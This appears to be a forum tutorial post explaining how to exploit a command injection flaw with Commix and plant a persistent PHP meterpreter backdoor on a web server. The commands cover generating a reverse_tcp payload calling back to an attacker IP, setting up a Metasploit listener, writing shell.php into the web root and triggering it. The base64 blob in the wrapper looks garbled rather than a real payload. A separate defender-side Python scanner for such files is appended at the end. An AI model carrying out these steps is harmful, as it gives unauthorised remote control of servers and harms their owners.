PHP Backdoor using Commix

ltx_Lazzarus
Posts: 55
Joined: Tue Apr 09, 2024 8:05 pm

Post by ltx_Lazzarus » Tue Apr 09, 2024 10:21 pm

Github: https://github.com/commixproject/commix

For uploadin' a PHP Backdoor, we're gonna use Commix (Command Injection Exploiter), and with this ripper tool, it's a piece of cake to find and take advantage of a command injection vulnerability in a certain dodgy parameter or string. Commix is written in the Python programming language, ya beauty!

INSTALLATION FOR KALI LINUX:
- Install Commix, following this command:

Code:

sudo apt-get install commix -y

- So once ya got Commix installed, you can give the target site a good ol' test for any command injection vulnerabilities by running the following dinky little command:

Code:

commix -u http://<SERVER-IP>/authg?c=whoami

- Commix'll give the URL ya provided a good ol' check for any sneaky command injection vulnerabilities. If it finds one, it'll ask if ya want a ripper pseudo-terminal shell. For this beaut example, I gotta say yes and Commix'll hook ya up with the pseudo shell, as you can see below:

Code:

commix(os_shell) > ls

bin boot dev etc home lib lib64 lost+found media mnt opt proc root run sbin srv sys tmp usr var

commix(os_shell) >

This can be a real ripper for sneakin' in and gettin' stuff done on the target system on the down-low.

UPLOAD A PHP BACKDOOR WI' COMMIX
So, seein' as that target server's runnin' the ol' LAMP stack, we can whip up a PHP meterpreter payload and upload it to the web server as a sneaky backdoor with Commix. Then we can use that to get into the target system whenever we need to.
-- 1 -- The first step's gonna be generating the PHP meterpreter payload with Msfvenom. You can do that by running the following command:

Code:

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.10 LPORT=1234 -e php/base64 -f raw > shell.php

-- 2 -- Once ya got that payload sorted, ya gotta tweak it a bit by addin' the ol' PHP tags so the script runs proper-like, for example:

Code:

<?php
eval(base64_decode(mQINBFRUAGoBEACuk6ze2V2pZtScf1U25N2CX19AeL7sVYwnyrTYuWdG2FmJx4xDLTLVUazp2AEmJhskulL7VCZPyg7ynfo20Tu96zUD7p0rnQA2k3Dz7dKHHh.eEsI5EZyFy1XodhUnEIjel2nGe6f1OO7Dr3UIEQw5JnkZyqMcbLCu9sM2twFyfaa8JNghfjltLJs3UjJ8ZnGGByMmWxrWQUItMpQjGr99nZf4L));
?>

-- 3 -- Now set up the listener with Metasploit:

Code:

msfconsole
msf> use multi/handler
msf> set payload php/meterpreter/reverse_tcp
msf> set LHOST <KALI-IP>
msf> set LPORT <PORT>
msf> run

-- 4 -- The next step's gonna be uploading that PHP shell we just whipped up to the web server. You can do that with Commix by running the following command:

Code:

commix -u http://<SERVER-IP>/authg?c=id --file-write='/home/kali/Desktop/shell.php' --file-dest='/var/www/html/shell.php'

-- 5 -- In this case, we'll be chuckin' the "shell.php" file up on the root of the web server. Now, it's recommended to put it in a directory that doesn't get too much foot traffic.
If the "shell.php" file gets uploaded without any dramas, you should get a message sayin' it was a success.
-- 6 -- We can snag a meterpreter session on the target by headin' over to the "shell.php" file on the web server. Just punch in the following URL into ya browser:

Code:

http://<SERVER-IP>/shell.php

-- 7 -- 'avin' a crack at that PHP code through the ol' web browser should do the trick and give ya a nice little meterpreter session on your listener.
stopthe4ttack.box
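A defender-side check for the artefact this post leaves behind, as an added example that is not part of the original post: it walks a web root and flags PHP files that pass decoded data straight into eval(), the wrapper shape shown in step 2. The function names, the extension list, the 120-character threshold and the sample files are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# eval()/assert() fed directly by a decoder call, the wrapper shape shown in step 2.
EVAL_DECODE = re.compile(
    rb"\b(?:eval|assert)\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(",
    re.IGNORECASE,
)
# A long unbroken base64 run; 120 chars is an assumed threshold, tune per code base.
LONG_B64 = re.compile(rb"[A-Za-z0-9+/=]{120,}")
PHP_SUFFIXES = {".php", ".phtml", ".php5", ".phar"}


def scan_webroot(root):
    """Return sorted (relative_path, reasons) for PHP files that look like encoded droppers."""
    findings = []
    for path in Path(root).rglob("*"):
        if not path.is_file() or path.suffix.lower() not in PHP_SUFFIXES:
            continue
        data = path.read_bytes()
        reasons = []
        if EVAL_DECODE.search(data):
            reasons.append("eval-of-decoded-data")
        if LONG_B64.search(data):
            reasons.append("long-base64-literal")
        if reasons:
            findings.append((path.relative_to(root).as_posix(), reasons))
    return sorted(findings)


def demo():
    """Build a constructed web root in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "index.php").write_text("<?php echo 'hello'; ?>\n")
        # Constructed stand-in for the wrapped payload: the blob is just 'A' * 160.
        (root / "uploads").mkdir()
        (root / "uploads" / "shell.php").write_text(
            "<?php\neval(base64_decode('" + "A" * 160 + "'));\n?>\n"
        )
        (root / "logo.png").write_bytes(b"A" * 200)  # non-PHP file, ignored
        return scan_webroot(root)


if __name__ == "__main__":
    for rel_path, reasons in demo():
        print(rel_path, ",".join(reasons))
```

Static patterns like these catch the unmodified wrapper only; pairing the scan with file-integrity monitoring on the web root and a web server user that cannot write there covers renamed or re-encoded variants.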
